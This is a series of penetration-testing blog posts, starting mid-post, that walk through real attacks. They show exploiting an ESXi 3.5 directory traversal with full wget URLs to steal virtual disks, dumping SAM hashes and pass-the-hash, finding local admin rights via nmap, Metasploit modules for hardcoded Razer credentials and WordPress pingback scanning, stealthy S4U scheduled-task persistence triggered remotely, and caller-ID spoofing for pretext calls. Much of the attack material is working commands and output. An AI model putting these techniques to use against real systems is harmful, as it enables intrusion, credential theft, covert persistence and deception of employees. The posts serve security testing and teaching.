|     /vmfs/volumes/473900a1-8f7c7801-a1a7-001e0b6eaf09/Win2k3-2/Win2k3-2.vmx
|     /vmfs/volumes/473900a1-8f7c7801-a1a7-001e0b6eaf09/Win2k3-3/Win2k3-3.vmx
|     /vmfs/volumes/473900a1-8f7c7801-a1a7-001e0b6eaf09/vmwks01/vmwks01.vmx
|_    /vmfs/volumes/473900a1-8f7c7801-a1a7-001e0b6eaf09/Win2k8/Win2k8.vmx
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
902/tcp  open   ssl/vmware-auth VMware Authentication Daemon 1.10 (Uses VNC, SOAP)
903/tcp  open   ssl/vmware-auth VMware Authentication Daemon 1.10 (Uses VNC, SOAP)
2381/tcp open   http            Apache httpd (SSL-only mode)
|_http-methods: No Allow or Public header in OPTIONS response (status code 302)
5988/tcp open   http            Web-Based Enterprise Management CIM serverOpenPegasus WBEM httpd
5989/tcp open   ssl/http        Web-Based Enterprise Management CIM serverOpenPegasus WBEM httpd
Device type: general purpose
Running: Linux 2.4.X

Instantly I noticed lines 18-24 were telling me this server was vulnerable to directory traversal, and it was even able to enumerate some of the files and folders.  Even better this server was running Vmware ESXi 3.5 hypervisor that was hosting multiple virtual machines.  Nmap was able to enumerate the file location of the virtual machines because it gained access to the “vmInventory.xml” file which lists what virtual machines are installed and the location on the filesystem.  At this point I get very excited and thought for sure I would be able to not only download some files as a proof of concept, but I was going to validate a critical security vulnerability.  If you are not familiar with directory traversal vulnerabilities I recommend you brush up your understanding before continuing.  Directory Traversal attacks can be explained here.

If you were interested in targeting this vulnerability specifically we could do so by entering the following command which would invoke nmap’s “http-vmware-path-vuln.nse” script that looks for directory traversal in vmware’s HTTP web services.  You can get a better understanding of what the NSE is doing exactly be reviewing the code located here.

#nmap –script http-vmware-path-vuln -p80,443,8222,8333 192.168.1.100

At this point I knew the following information about the vulnerability.  It was running a vmware hypervisor, the vulnerability was explicitly present on port 443/tcp, and the NSE script was able to enumerate the full path location to where the Virtual Machines were stored.  All we needed to do now was figure out how to make the proper HTTP GET request that would break out of the web servers website directory and access any part of the filesystem.

It would be great to gain access to a virtual server to gain access to the local hashes from the SAM file.  The reason it is so important to gain access to this local hash is because the majority of all IT shops will have the same password for their local Administrator account on all of their servers and workstations.  Or all the workstations have the same password, and all the servers have a different password.

I took a look at metasploit to see if they had a module to exploit this vulnerability.  The framework did in fact have the module I was looking for to take advantage of this vulnerable to server.  I initially tried to exploit this vulnerability using the metasploit module, but encountered this bug.  Now I needed to figure out how I could exploit this directory traversal manually.

msf > info auxiliary/scanner/http/vmware_server_dir_trav

Basic options:
Name     Current Setting                                 Required  Description
----     ---------------                                 --------  -----------
FILE     /etc/vmware/hostd/vmInventory.xml               yes       The file to view
Proxies                                                  no        Use a proxy chain
RHOSTS                                                   yes       The target address range or CIDR identifier
RPORT    8222                                            yes       The target port
THREADS  1                                               yes       The number of concurrent threads
TRAV     /sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E  yes       Traversal Depth
VHOST                                                    no        HTTP server virtual host

Looking at the metasploit module, I’m able to craft together the HTTP request that might have been used to access the “vmInventory.xml” file outside of the web root.  If the following request would work to obtain the “vmInventory.xml” file, I should be able to tweak the request to access the virtual machines from this:

https://192.168.1.100/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/vmware/hostd/vmInventory.xml

to this:

https://192.168.1.100/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/vmfs/volumes/473900a1-8f7c7801-a1a7-001e0b6eaf09/Win2k8/Win2k8.vmx

Putting it all together we use wget with a flag to ignore the self-signed certificate error and attempt to download a file outside the website root.  Make sure you avoid the web browser if possible when testing.  I was using Firefox and Chrome in an attempt to validate a working URL but was unable have a file to download through the browser.

wget –no-check-certificate https://192.168.1.100/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/vmfs/volumes/473900a1-8f7c7801-a1a7-001e0b6eaf09/Win2k8/Win2k8.vmx

When I successfully pulled down the vmx file I was very excited because I knew at this point I had a great chance of pulling down all of the files required to boot up this Virtual Machine.  If I was able to boot up this Virtual Machine I was sure to be able to crack out the local hashes from SAM hive as long as the servers were not encrypted.  Everyone is focused on encrypting their laptops, rarely ever does anyone run whole disk encryption on their servers.

the vmx file that I had downloaded is only a configuration file, and not part of the server operating system.  I know at this time that I’m able to pull down any file that the web account has access to on this ESXi 3.5 server.  If I look at some vmware documentation, I could logically guess the name of other files that make up this virtual machine.

Now that we downloaded a file, lets look at it to see if it contains any valuable information which can help leverage further attack.

Win2k8.vmx

#!/usr/bin/vmware
config.version = "8"
virtualHW.version = "4"
floppy0.present = "true"
nvram = "Win2k8.nvram"
deploymentPlatform = "windows"
virtualHW.productCompatibility = "hosted"
tools.upgrade.policy = "useGlobal"
powerType.powerOff = "default"
powerType.powerOn = "default"
powerType.suspend = "default"
powerType.reset = "default"

displayName = "Win2k8"
extendedConfigFile = "Win2k8.vmxf"

scsi0.present = "true"
scsi0.sharedBus = "none"
scsi0.virtualDev = "lsilogic"
memsize = "8324"
scsi0:0.present = "true"
scsi0:0.fileName = "Win2k8.vmdk"
scsi0:0.deviceType = "scsi-hardDisk"
ide0:0.present = "true"
ide0:0.clientDevice = "FALSE"
ide0:0.deviceType = "cdrom-image"
ide0:0.startConnected = "true"
floppy0.startConnected = "false"
floppy0.clientDevice = "true"
ethernet0.present = "true"
ethernet0.virtualDev = "e1000"
ethernet0.networkName = "VM Network"
ethernet0.addressType = "generated"
guestOSAltName = "Microsoft Windows Server 2008 (64-bit)"
guestOS = "longhorn-64"
uuid.location = ""
uuid.bios = ""
toolScripts.afterPowerOn = "true"
toolScripts.afterResume = "true"
toolScripts.beforeSuspend = "true"
toolScripts.beforePowerOff = "true"

floppy0.fileName = "fd0"
bios.bootDelay = "10000"
sched.cpu.units = "mhz"
sched.cpu.shares = "normal"
sched.cpu.affinity = "all"
sched.mem.shares = "normal"

scsi0:0.redo = ""
ethernet0.generatedAddress = "00:0o:28:oo:55:aa"
tools.syncTime = "FALSE"
sched.swap.derivedName = "/vmfs/volumes/473900a1-8f7c7801-a1a7-001e0b6eaf09/Win2k8/Win2k8-5b631381.vswp"
ethernet0.generatedAddressOffset = "0"
tools.remindInstall = "TRUE"

There is a load of information in this configuration file that can assist, but I’m most interested in lines 5,15,22, and 53.  This is because these are filenames that help make up the entire Virtual Machine.  At this point I have gained the absolute full path to these files:

/vmfs/volumes/473900a1-8f7c7801-a1a7-001e0b6eaf09/Win2k8/Win2k8-5b631381.vswp
/vmfs/volumes/473900a1-8f7c7801-a1a7-001e0b6eaf09/Win2k8/Win2k8.nvram
/vmfs/volumes/473900a1-8f7c7801-a1a7-001e0b6eaf09/Win2k8/Win2k8.vmxf
/vmfs/volumes/473900a1-8f7c7801-a1a7-001e0b6eaf09/Win2k8/Win2k8.vmdk

At this point I had enough knowledge to make an attempt to download more files.  With the following wget command below I was able to pull down the vmdk configuration file.  This file is similar to the vmx in the sense that the file is not part of the server operating system, but rather configuration settings for it.

wget –no-check-certificate https://192.168.1.100/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/vmfs/volumes/473900a1-8f7c7801-a1a7-001e0b6eaf09/Win2k8/Win2k8.vmdk

Lets open up this file with our favorite text editor to see if it yields any useful information.

Win2k8.vmdk

# Disk DescriptorFile
version=1
CID=01d0bfde
parentCID=ffffffff
createType="vmfs"

# Extent description
RW 62914560 VMFS "Win2k8-flat.vmdk"

# The Disk Data Base
#DDB

ddb.toolsVersion = "0"
ddb.adapterType = "lsilogic"
ddb.geometry.sectors = "63"
ddb.geometry.heads = "255"
ddb.geometry.cylinders = "3916"
ddb.uuid = "60 00 C2 9b 7f 1b 27 1a-5b b6 ad f9 41 b4 5f 9c"
ddb.virtualHWVersion = "4"

Line 8 is critical information to this equation.  A virtual machine encapsulates an entire server or desktop environment in a VMDK file.  With the following wget command we are able to pull down the 30gb virtual hdd that contains the entire server.

wget –no-check-certificate https://192.168.1.100/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/vmfs/volumes/473900a1-8f7c7801-a1a7-001e0b6eaf09/Win2k8/Win2k8-flat.vmdk

At this point once we have all of the critical files required to fire up our virtual machine on my laptop with the use of VMware workstation.  You may be required to use the VMware converter in order for the virtual machine to properly boot up in your environment.  After all you did steal the server out of its ESXi 3.5 environment and placed it in your own VMware workstation, it’s possible things won’t go smoothly.

Once your virtual machine is booted up, we’ll want to boot it off  a LIVE cd or any other bootable environment that has read and write access the NTFS partition so we can follow the sticky keys hack.  This will allow us to gain access to a SYSTEM level command prompt to create a user and dump the local hashes using any method you see fit (pwdump, fgdump, gsecdump, meterpreter | hashdump, etc…)

If you didn’t want to boot up the virtual machine you could mount the virtual hdd (Win2k8-flat.vmdk) in Windows or Linux.  After the mount is completed you could follow the article Cracking Syskey and the SAM on Windows XP, 2000 and NT 4 using Open Source Tools to gain access to the hashes of any local account on this virtual machine.

Once we have gained access to the password hashes we can attempt to crack them, or even better pass them using the tactic pass-the-hash.  Metasploit offers the ability to pass-the-hash nice and easy from inside the framework using either the smb_login module or the psexec module.  I often times start with smb_login scanning the entire network to determine where my local hashes are good on the network.  Once I have results of where I can successfully log into systems using pass-the-hash I use psexec to actually remotely login to get a meterpreter.

This is just one of many examples I have encountered where my tools have failed me and I have had to go deep and get dirty by better understanding the vulnerabilities to properly exploit them.  We have seen a case where Nessus was not able to detect any directory traversal with this system, and the metasploit module crashed when attempting to exploit it, but lucky for me I had my handy dandy wget to help assist when all else had failed to get the job done and gain access to lots of additional systems on the network.

The post Stealing Servers Through Directory Traversal appeared first on Pentest Geek - Penetration Testing - Infosec Professionals.

Recently a member from the Trustwave SpiderLabs team created an nmap NSE script that could be used to take a screenshot of webpages as it scanned the network. Working for a top 10 accounting firm, I conduct a lot of internal penetration tests for clients that operate on very large networks, and sometimes I’m required to audit entire counties.  Having the ability to view all the webpages on the internal network without being required to manually type in each addresses into the browser sounded amazing.  This was very exciting news now that there was a way to automate this process and have the ability to scale.  I dove in right away to get started by installing the script based on the instructions in the link listed below:

http://blog.spiderlabs.com/2012/06/using-nmap-to-screenshot-web-services.html

I highly suggest you look over the article above as I wrote this article in hopes that it would help assist anyone when having issues getting the http-screenshot NSE script to function properly with the latest version of nmap.

I encountered some adversity while following the tutorial since I wasn’t running BT5.  I was running Ubuntu 10.04.04 amd64 and had just installed the latest version of nmap (6.02) via svn and compiled from source.

The first problem with the instructions was the version of wkhtmltoimage-i386 didn’t work on my system, most likely due to my x64 architecture.  Be sure to test your version of wkhtmltoimage before continuing.  The command should display a help menu with options when ran without any arguments.

Not working:

root@lockout:~# file ./wkhtmltoimage-i386
./wkhtmltoimage-i386: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
root@lockout:~# ./wkhtmltoimage-i386
root@lockout:~#

Make sure you download the correct version that will work with your OS, and test it before continuing.  wkhtmtoimage downloads can be found here.

In my case I tweak the tutorial to this:

wget https://wkhtmltopdf.googlecode.com/files/wkhtmltoimage-0.11.0_rc1-static-amd64.tar.bz2
tar -jxvf wkhtmltoimage-0.11.0_rc1-static-amd64.tar.bz2
cp wkhtmltoimage-amd64 /usr/local/bin/

This was just the beginning of my problems as I attempted to get this NSE script to function properly.   I continued to follow the instructions like the tutorial had listed

git clone git://github.com/SpiderLabs/Nmap-Tools.git
cd Nmap-Tools/NSE/
cp http-screenshot.nse /usr/local/share/nmap/scripts/
nmap –script-updatedb

The problems started when I tried to update my nmap database that keeps track of the NSE scripts.  Here is what the output looked like on my initial run:

root@lockout:~/Nmap-Tools/NSE# nmap --script-updatedb
Starting Nmap 6.02 ( http://nmap.org ) at 2012-07-11 23:36 CDT
NSE: Updating rule database.
NSE: Failed to load /usr/local/bin/../share/nmap/scripts//http-screenshot.nse:
/usr/local/bin/../share/nmap/scripts//http-screenshot.nse:30: variable 'shortport' is not declared
stack traceback:
[C]: in function 'error'
/usr/local/bin/../share/nmap/nselib/strict.lua:80: in function '__index'
/usr/local/bin/../share/nmap/scripts//http-screenshot.nse:30: in function </usr/local/bin/../share/nmap/scripts//http-screenshot.nse:1>
NSE: failed to initialize the script engine:
/usr/local/bin/../share/nmap/nse_main.lua:460: could not load script
stack traceback:
[C]: in function 'error'
/usr/local/bin/../share/nmap/nse_main.lua:460: in function 'new'
/usr/local/bin/../share/nmap/nse_main.lua:1113: in main chunk
[C]: in ?

QUITTING!
root@lockout:~/Nmap-Tools/NSE#

The first problem that I noticed right away was “variable ‘shortport’ is not declared on live 5 above”.  I opened up the script to try and make some changes to the http-screenshot NSE script.

On line #28 you should see the line below:

require "shortport"

replace this line with the following to declare the variable.

local shortport = require "shortport"

Once you have saved your changes, lets try to update the nmap database.  If everything went successfully, you should have some output like below that shows the database updated.  If you still have issues related to variables, place the string ‘local’ in front of the variable causing issues, and that should fix your problem.

root@lockout:~/Nmap-Tools/NSE# nmap --script-updatedb
Starting Nmap 6.02 ( http://nmap.org ) at 2012-07-11 23:43 CDT
NSE: Updating rule database.
NSE: Script Database updated successfully.
Nmap done: 0 IP addresses (0 hosts up) scanned in 1.04 seconds
root@lockout:~/Nmap-Tools/NSE#

Before attempting to run the script, we will need to update a few items to make the http-screenshot NSE script to run properly.  The first item we needed to modify was the line that called wkhtmltoimage-i386 to wkhtmltoimage-amd64 since we downloaded and installed a different version above.

On line #48 you should see the line below:

local cmd = "wkhtmltoimage-i386 -n " .. prefix .. "://" .. host.ip .. ":" .. port.number .. " " .. filename .. " 2> null   >null"

replace the line above with the following to changes listed below. We first want to change the quality that wkhtmtoimage uses to create screenshots of the webpage.  This will save disk space on your hdd and speed up the downloading of screenshots as well.  In my testing, I noticed that a quality of 20 (default 94) was not very noticeable to the eye, but decreased the size of the screenshots significantly.

local cmd = "wkhtmltoimage-amd64 --quality 20 -n " .. prefix .. "://" .. host.ip .. ":" .. port.number .. " " .. filename .. " 2> null   >null"

Make sure you update the nmap database everytime you make a change to the NSE script.

root@lockout:~/Nmap-Tools/NSE# nmap --script-updatedb

At this point I thought I was smooth sailing now that nmap was scanning properly, and I wasn’t getting any errors.  Well, I was wrong.  Nmap would continually hang when scanning the network, and specifically when running the NSE portion of the namp scan.  It was getting hung on the http-screenshot NSE script specifically, and I needed to find out what line of code was causing the issue.

http-screenshot.nse hanging

...
Completed SYN Stealth Scan against 192.168.51.14 in 45.47s (10 hosts left)
Completed SYN Stealth Scan against 192.168.51.12 in 45.50s (9 hosts left)
Completed SYN Stealth Scan against 192.168.51.0 in 45.51s (8 hosts left)
Completed SYN Stealth Scan against 192.168.51.5 in 45.51s (7 hosts left)
Completed SYN Stealth Scan against 192.168.51.22 in 45.53s (6 hosts left)
Completed SYN Stealth Scan against 192.168.51.2 in 45.53s (5 hosts left)
Completed SYN Stealth Scan against 192.168.51.1 in 45.55s (4 hosts left)
Completed SYN Stealth Scan against 192.168.51.3 in 45.55s (3 hosts left)
Completed SYN Stealth Scan against 192.168.51.15 in 45.55s (2 hosts left)
Completed SYN Stealth Scan against 192.168.51.19 in 45.61s (1 host left)
Completed SYN Stealth Scan at 23:49, 47.00s elapsed (38000 total ports)
NSE: Script scanning 38 hosts.
Initiating NSE at 23:49

I noticed that the script called the binary wkhtmltoimage-amd64, but never specified a timeout if the program never returned a result in a timely fashion.  I started looking for options in wkhtmtoimage to see if a timeout value could be specifed that would give up after set amount of time. That was when I stumbled up this article here that essential states the pre packaged binary that I downloaded did not have a timeout by default.

I knew linux had a ‘timeout’ package that I could download right from the Ubuntu repositories.  Since the NSE script was making a system call, I could install the ‘timeout’ package and use it directly in the NSE script.

apt-get install timeout -y

Now that I have the timeout utility installed on my OS, I was ready to modify the script for one last time.

local cmd = "wkhtmltoimage-amd64 --quality 20 -n " .. prefix .. "://" .. host.ip .. ":" .. port.number .. " " .. filename .. " 2> null   >null"

local cmd = "timeout 20 wkhtmltoimage-amd64 --quality 20 -n " .. prefix .. "://" .. host.ip .. ":" .. port.number .. " " .. filename .. " 2> null   >null"

Make sure that when you run the http-screenshot.nse script that you utilize the -sV flag in nmap to properly enumerate http vs https services.

root@lockout:~/Nmap-Tools/NSE# nmap -sV -p 80,443 --script=http-screenshot google.com

If your nmap output continues to tell you “failed (verify wkhtmltoimage-i386 is in your path)” but the script is still output images to your current working directory, this is because there is a flaw in the programs logic.  The code below will always make result = “failed (verify wkhtmltoimage-i386 is in your path)” because ret is actually a boolean value and not a string or decimal.  This means that the ‘ret’ variable will never == 0 and therefore never give you the output you wish to see such as “Saved to screenshot-nmap-74.125.225.7:443.png”

-- If the command was successful, print the saved message, otherwise print the fail message
local result = "failed (verify wkhtmltoimage-i386 is in your path)"

if ret == 0 then
result = "Saved to " .. filename
end

In order to make the code function how it was intented we will change the code to the following:

-- If the command was successful, print the saved message, otherwise print the fail message
local result = "failed (verify wkhtmltoimage-i386 is in your path)"

if ret then
result = "Saved to " .. filename
end

I tested these changes and it helped my performance significantly.  Nmap was scanning entire class C networks in a timely fashion and I was no longer getting hung on the NSE scripts!

Hope this helps some of you out there who may have had issues getting the http-screenshot NSE script to run properly initially.

The post Using Nmap to Screenshot Web Services Troubleshooting appeared first on Pentest Geek - Penetration Testing - Infosec Professionals.

While conducting  penetration tests I almost always obtain user credentials; sometimes in cleartext, and other times just the hash. If your like me; you’ve often wondered, where do I have local Administrative privileges with these credentials.  If you haven’t checked out Joesph Pierini’s blog post here, I highly suggest you check it out before continuing.

I can’t even count the number of times I have had user credentials or a hash and wondered where I had Local Administrative privileges.  Sure I could fire up metasploit’s msfconsole and psexec across the network.  Hell I could even create a resource script to automate the entire task for me, but its doesn’t scale very well and often times the default metasploit config is not very stealth when you flag every workstation and server antivirus on the network.  That’s when I started to utilize Nmap’s smb-enum-shares NSE script.  I’ve been aware of the script for sometime now, but I wasn’t aware that you can feed it arguments such as a username, password, domain and others.  Even better, the NSE script doesn’t need cleartext credentials so you can pass-the-hash like we all love to do.  The syntax is pretty straightforward as seen below:

nmap -p 445 –open –script=smb-enum-shares.nse –script-args=smbuser=username,smbpass=password,smbdomain=example.net 192.168.1.1/24 -oA 192.168.1.x_local_admin

This article isn’t intended to show you how to use Nmap’s NSE script, but rather to demonstrate how lethal of a combination this NSE script can be when you write yourself a little  script to parse the results.  I was recently trying to use this script against a chunk of 1500 nodes on the network and going through the *.nmap file was incredibly painful. If my account only had Local Admin on one of these many systems it was like finding a needle in a haystack.  That’s when I realized I needed to write a quick and dirty script to parse the XML ouptut that Nmap gives us.

In some of my test runs on an internal network using this nmap NSE I was able to scan 50 nodes in just 22 seconds to find Local Admin on 9 systems. In another test case I ran it against 300 systems on an internal network and found Local Admin on 114 devices in just 120 seconds.

Now I understand if you have already dumped the  Local Administrator credentials (UID:500) this tactic isn’t incredibly useful because you can most likely pass-the-hash into anything and everything.  When you’re on a tougher network and the Net Admin has configured GPO “Deny access to this computer through the network” and places the Local Administrators in that group, your pass-the-hash tactic isn’t getting you anywhere. Or the case where every single Local Administrator password is unique, pass-the-hash is essentially useless.  That’s when I break out Windows Credential Editor (WCE) and dump the logged in user credentials out of the running memory.  You might not think Domain User credentials are all that useful, but they can be incredibly useful since they are allowed to perform network logons when the Local Administrator accounts may not.

I started out using Ruby’s REXML library, only to find out its old and busted and everyone in freenode.net #ruby was pointing me to Nokogiri.  I should have known better from the get go considering this is what Metasploit uses to import nmap XML files into the framework.  After spending some time learning the basics of Nokogiri and some awesome help from Bluebie in #ruby I had a functional ruby script that was able to parse the nmap XML output and tell me where my credentials had Local Admin rights.

Now I know my code is not 100% accurate because it doesn’t take into account hosts that allow anonymous READ/WRITE access to drives, but it definitely helps the hunt for Local Admin. The script below essentially looks for systems that we have READ/WRITE access to once credentials have been fed to NMAP’s NSE script.  If we have READ/WRITE access to the C$ there is a pretty good chance that we have Local Admin on that system.

Below is the code to parse Nmap’s XML output after scanning:

#!/usr/bin/ruby -w
require 'nokogiri'

# check to make sure an argument was given
if ARGV.size != 1 then
  puts "n[-] Usage: ./parseadmin.rb <nmap.xml>nn"
  exit
end

xml = Nokogiri::XML.parse(open ARGV[0])

# diplay which ip address our credentials have local admin on
xml.css('nmaprun host').each do |host|
  begin
    target_address = host.css('address').first['addr']
    target_hostnames = host.css('hostname').first['name']
    target_scripts = host.css('hostscript script')
  rescue Exception => e
    puts "[-] Error On: #{target_address}t#{target_hostnames}"
    next
  end

  target_scripts.each do |script|
    puts "[+] Local Admin on:  #{target_address}t#{target_hostnames}" if script['output'] =~ /WRITE/
  end
end

Here is what the script should look like when you don’t feed it any arguments:

zeknox@lockout:~$ ruby parseadmin.rb

[-] Usage: ./parseadmin.rb <nmap.xml>

You can see that the script wants an nmap.xml file, so lets feed the script one and see what happens.

zeknox@lockout:~$ ruby parseadmin.rb nmap.xml
[+] Local Admin on:  192.168.1.40	hostname1.domain.local
[+] Local Admin on:  192.168.1.34	hostname2
[+] Local Admin on:  192.168.1.41	hostname3.domain.local
[+] Local Admin on:  192.168.1.43	hostname4.domain.local
[+] Local Admin on:  192.168.1.45	hostname5
[+] Local Admin on:  192.168.2.51	hostname6
[+] Local Admin on:  192.168.2.99	hostname7.domain.local
[+] Local Admin on:  192.168.2.95	hostname8.domain.local
[+] Local Admin on:  192.168.2.119	hostname9.domain.local
zeknox@lockout:$

Once the script has parsed the file you should have some hosts that should give you Local Admin on.  You can validate this by using metasploit psexec or my favorite is changing your credentials running in Windows memory with WCE and attempt to map a network drive to c$ to stay away from antivirus.

net use * \192.168.1.40c$

Happy Hunting for Local Admin!

The post Using Nmap to find Local Admin appeared first on Pentest Geek - Penetration Testing - Infosec Professionals.

Metasploit modules [1, 2]

A few days ago I was chatting with pasv about a recent vulnerability he discovered. Apparently there was demand for Razer Synapse which syncs the configuration for a Razer mouse to the “cloud”. Syncing configurations to the cloud was most likely needed since some of Razer models have so many buttons the mouse has its own full blown number pad on the side. Pasv got bored and did what any good bored security professional does and reverse engineered the Razer Synapse installer. He discovered that the encryption key and IV were hard coded for the “Remember my password” feature (PoC).

The vulnerability was recently fixed before the new year (12/27/12), via an auto-update in the Razer Synapse software but we figure there are probably at least a few configuration files still sitting out there. This vulnerability was very similar to a recent metasploit module @zeknox and I released about Spark IM so it was fairly painless to write up a new module to exploit this configuration.

The credentials are stored within the configuration file “RazerLoginData.xml” which is located in the %AppData%\local\Razer\Synapse\Accounts folder of any user using the software. The configuration file is easily parsed and multiple credentials can be stored in each configuration file so there is a chance of getting more than one username/password combination.

Once the module parses out the configuration file(s) the passwords can be decrypted with the hardcoded key and IV  as seen below:

The result is a module that quickly looks through each users profile, parses the config file, and spits out the cleartext credentials. The newer version of the Razer Synapse software alters the configuration file slightly so the module will only try to parse the vulnerable credentials.

Module in Action

Logging to the Database

A pull request for the module has been submitted to metasploit and currently pending acceptance into the trunk. The module is also available on github.

And more WordPress

I also had another module added to metasploit last week related to all of the fun we were having with port scanning through a default WordPress 3.5 site. While the previous module has been working great we felt it would be of more use if you could quickly find vulnerable WordPress installations.

The module only needs RHOSTS and an optional target URI to scan a large number of web services to see if any of them are vulnerable. A HEAD request to the web service will return with the X-Pingback header showing the location of the xmlrpc.php file, which is then used to handle incoming requests to the XML-RPC API.

With the X-Pingback header present a vulnerable blog post is needed to exploit the vulnerability. The WordPress feed page contains links to the latest blog posts so the module will attempt to resolve the URI /?feed=rss2. This will return the location of the feed page which can be parsed to gather the URLs of blog posts to test against.

After parsing out the URLs within link tags the module crafts a POST request and sends it to the URL for the xmlrpc.php file identified previously. The data is simple XML seen below telling the site to use the pingback API. The target is a URL to the loopback address, http://127.0.0.1, and the valid_blog_post is a link to one of the blog posts found.

Upon receiving the POST request the WordPress site will attempt to connect to itself and then respond with XML containing a fault code and string. If the code is anything but 16 it means the WordPress site has made a successful connection and the scanned port is open. If the WordPress site can identify its own port as open, then it is vulnerable.

This will let you quickly set your RHOSTS with something like services –p 80 –R to scan all websites you have in your services table as seen below.

Module in Action

Verbose output

You can find the module in your latest version of metasploit or here.

The post Hard coded encryption keys and more WordPress fun appeared first on Pentest Geek - Penetration Testing - Infosec Professionals.

Github module [1, 2]

I came across an interesting article by scriptjunkie (which you should really read) about running code on a machine at any time using service-for-user. By changing one line in the export XML of a scheduled task you effectively get a scheduled task that can run whether or not a user is logged in, whether or not the system reboots, whether or not you have the user’s password, run as a limited user, and doesn’t require bypassing UAC! This isn’t an interactive logon but can still be very useful in certain situations.

This works with any user with logon as batch job. While scriptjunkies blog post only showed altering a basic task scheduled to run every hour, it is possible to create more complex triggers based off a variety of things to make a more flexible trigger for your payload. Some of the triggers can even be used to replicate functionality for non-privileged accounts that are usually restricted. Some can even be used to trigger a scheduled task remotely from only your IP address.

Not all of these are available to a non-privileged user or without hitting UAC issues (such as At startup or At log on) but you can still use a time based schedule, on lock/unlock, or event attempt to replicate the functionality of a restricted one with On an event. With these you do have a lot of flexibility to meet whatever your goal is, one of mine earlier on was to emulate the At log on.

While playing with the On an event trigger I noticed there are a number of useful events that occur within the System and Application logs when a user logs in and when a system starts. I need to spend more time to working with some of the kinks with boot events because they appear before the scheduler is up. However while looking around the events caused by a user logging in I noticed the following event.

This event triggers each time a user logs into a licensed copy of Windows and the event is in the Application event log which is generally available to non-privileged users. You can quickly create a trigger for this event via the task scheduler or command line if you know the syntax.

And then when you export it to XML you will get the following as a trigger.

With this trigger and the exported XML modified to set the logon type to Service-for-user (<LogonType>S4U</LogonType> within the principles section of the XML) you now have a scheduled task that will trigger whenever the user logs in.

After getting the logon to work I wanted to find an event that could be remotely triggered by any system on the same network. While playing around and sending different traffic at my test I noticed a few common trends that could be used for to meet my goal. When sending malformed data/authentication to certain services, of particular note SMB and terminal services (RDP), an event was created. One of the ones I found most useful is shown below.

At the end of the data in the Binary tags is the error code 80090330 (SEC_E_DECRYPT_FAILURE) meaning Windows thinks there was corruption as the data was sent and couldn’t decrypt the traffic. Two things jumped out for me when I saw this event, the fact that it was in the System log which generally isn’t restricted and the IP address of my scanning box is present. The first means a trigger can be created that works with most unprivileged users and doesn’t have to bother with UAC issues. The second, my IP address, can then be used within the trigger to make sure only requests coming from my scanning machine can be the one to trigger the scheduled task! Causing a machine to create this event is also trivial, all you need to do is an nmap -sV -p 3389 <IP Address>.

To trigger on the data withing an event you will need a XPath query to look for the event ID and IP address. The XPath I used was *[System[EventID=56]] and *[EventData[Data='192.168.2.18']] to single out this particular event. As seen in the screenshot above containing the event XML has the <System> tag which contains the event ID.  The *[System[ section means to search anywhere in the event (denoted by the *) for the <System> tags. Any arguments feed to this will look only within the <System> tags and could be any of the sub-tags and you could also add in multiples to focus the definition even more such as giving the provider name as *[System[Provider[Name='TermDD'] and EventID=56]]. Then I just added an ‘and’ clause and combined another section looking for where Data=’192.168.2.18′ within the EventData sections.

It is easy to test the XPath queries within the event viewer. The event filter will allow you to manually change the XML to include XPaths so you can determine what you want to use. Below is what my XPath looked like when I was getting ready to make my scheduled task.

Now you can either do all of these by modifying the XML export of a scheduled task or use my new handy dandy Metasploit module @zeknox and I wrote. It supports a few premade triggers but will accept event ID/Log along with an optional XPath if you desire.

And once that is done all you need to do to trigger the scheduled task is run the nmap version scan on terminal services and you get a new shell! Be careful because this event does not trigger repeatedly after nmap scans, it will only trigger on the first scan. If you muck up the first attempt you will have to wait an hour or so till you can do it again.  It will also generate event ID 36888, an Schannel event every time you scan terminal services but it doesn’t contain the IP address within the alert.

If you don’t have terminal services open on the box you can always look for something else to use. I am going to be playing with an event ID 40968 from LsaSrv in the System log due to an invalid authentication attempt which couldn’t be decoded. The easiest way to trigger this is to scan for MS-04-007 with something like Nessus but that might be something you want to avoid in case something like an IDS causes an alert for it.

From the view of the victim all you see is a new scheduled task that has a “Custom event filter” with no other indications of  anything malicious. If you don’t specify the task name the module will assign a randomly generated name for both the payload and task however, which might raise an eyebrow or two if someone views it.

I tried to make the module as flexible as possible to allow the user to specify whatever event they would like to trigger on. If anyone else finds any others of use please let me know! I’d love to play with some different ones. The module has a few pre-set triggers for things like user logon (using the windows license validation event from above) or on user locking, and time based schedule. It will display and save to the notes database commands to quickly delete the task and payload as well.

The best place to grab the code is over on the following github [1, 2]. The s4u_persistence file needs to go into Metasploit directory under  ‘data/exploits/’. It is an outline of an exported XML used in the module. The module is currently submitted as a pull request to Metasploit.

EDIT: The module has now been merged into Metasploit, grab it at your nearest msfupdate!

The post Scheduled tasks with S4U and on demand persistence appeared first on Pentest Geek - Penetration Testing - Infosec Professionals.

If we’re going to perform some pre-text phone calls we have a couple different options when it comes to the caller ID. We really only have 3 possible options which are: we do nothing to the phone number, we block our phone number, or we spoof our phone number.

Doing nothing to the caller ID will sometimes work depending on the area code you call from versus the area code that your client is located in. In my experiences, sometimes not blocking the number yields better results than blocking the number. I always feel like users are more suspicious when the caller ID says ‘blocked’or ‘unavailable’. Not only are they on heightened awareness, but I feel like they are less likely to even answer the phone thinking it’s most likely a telemarketer.

This brings us to the topic of spoofing your caller ID. I know there are tons of different ways to accomplish this task, but for the scope of this article, I’m going to discuss the method I use, which also seems to be the easiest to implement. Before I continue, I want to give a huge shoutout to my Accuvant LABS colleague Noah Beddome who showed me the ropes on caller ID spoofing. Thanks Noah!

The first item that we will perform is creating an account for a cloud PBX provider. I personally use http://vitelity.net/ because the account is completely free to sign up. The only item we need to pay for is the minutes that we use when we make our phone calls which is extremely cheap.

Once you’ve created your free Vitelity account, you’ll want to login to the Administration portal to configure your PBX to use a softphone. A softphone is nothing more than a software that runs on your computer. It essentially acts as a client that communicates with the PBX server in the cloud which seems to act very similar to an outlook client configured to use exchange.

